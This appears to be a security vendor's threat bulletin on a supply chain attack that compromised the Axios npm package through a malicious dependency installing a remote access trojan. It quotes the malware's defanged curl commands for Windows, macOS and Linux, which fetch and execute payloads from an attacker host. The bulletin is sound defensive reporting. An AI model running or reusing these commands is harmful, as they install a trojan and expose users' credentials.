TL;DR
- The Axios npm package suffered a supply chain attack. While malicious packages are no longer active, it’s important to hunt for activity which occurred while they were active: March 31 00:21 UTC–03:15 UTC.
- The Axios npm package is a popular dependency used by other software, resulting in an impact against many organizations.
- The malware ran a remote access trojan on impacted systems and it’s best to treat all npm tokens, AWS access keys, SSH private keys, and other credentials stored on the system as compromised.
The Axios npm package suffered a supply chain attack for a short time on March 30 and 31. During the compromise, automated or manual updates would have caused the execution of malicious code. The malware was able to execute code on Windows, MacOS, and Linux systems.
What happened?
The Axios npm package was compromised using the package maintainer’s access. The threat actors added a new dependency plain-crypto-js@4.2.1 to the Axios library, so any Axios updates or installs during this time frame also installed this new, malicious dependency. This worked recursively, impacting any software that had Axios as a dependency. This malicious dependency was responsible for reaching out to the attacker infrastructure and executing a remote access trojan (RAT) on the system.
The actors created a RAT for Windows, macOS, and Linux systems.
Windows:
The malware writes, executes, and deletes a VBS script from the user’s “AppData\Local\Temp” directory. This VBS script, when executed, executes curl to pull a remote payload which the attacker had staged.
curl -s -X POST -d “packages[.]npm[.]org/product1”
“http[:]//sfrclak[.]com:8000/6202033” >
“C:\Users\username\AppData\Local\Temp\6202033.ps1” & “C:\ProgramData\wt.exe” -w hidden -ep bypass -file
“C:\Users\username\AppData\Local\Temp\6202033.ps1”
“http[:]//sfrclak[.]com:8000/6202033” & del
“C:\Users\username\AppData\Local\Temp\6202033.ps1” /f
The curl command writes a PowerShell script to the user’s directory, which will be executed by wt.exe (which is a renamed copy of PowerShell; this technique is an attempt to bypass detections which look for “PowerShell.exe” executing suspicious scripts). This PowerShell is responsible for loading the trojan. Once executed, the PowerShell script is also deleted to cover their tracks.
MacOs:
The malicious code executes the following command, naming the trojan file as `com.apple.act.mond` to disguise it as native Apple binary.
curl -o /Library/Caches/com.apple.act.mond -d packages.npm.org/product0 -s http[:]//sfrclak[.]com:8000/6202033
Linux:
The malicious code run on Linux just downloads the remote content, saves it as a python script, and executes it.
/usr/bin/dash -c curl -o /tmp/ld.py -d packages[.]npm[.]org/product2 -s
http[:]//sfrclak[.]com:8000/6202033 && nohup python3 /tmp/ld.py
http[:]//sfrclak[.]com:8000/6202033 > /dev/null 2 > &1&
What Expel is doing
The Expel SOC has been working with impacted organizations and providing remediation since this activity began. Expel first saw an alert from one of our custom detections about this hitting a customer at approximately 2026-03-31T00:50:00 UTC (~22 minutes after the package went live). After we saw the activity impacting multiple organizations, we pushed communications to our customers as a Threat Bulletin and created an Emerging Threat Hunt to confirm all incidents were caught.
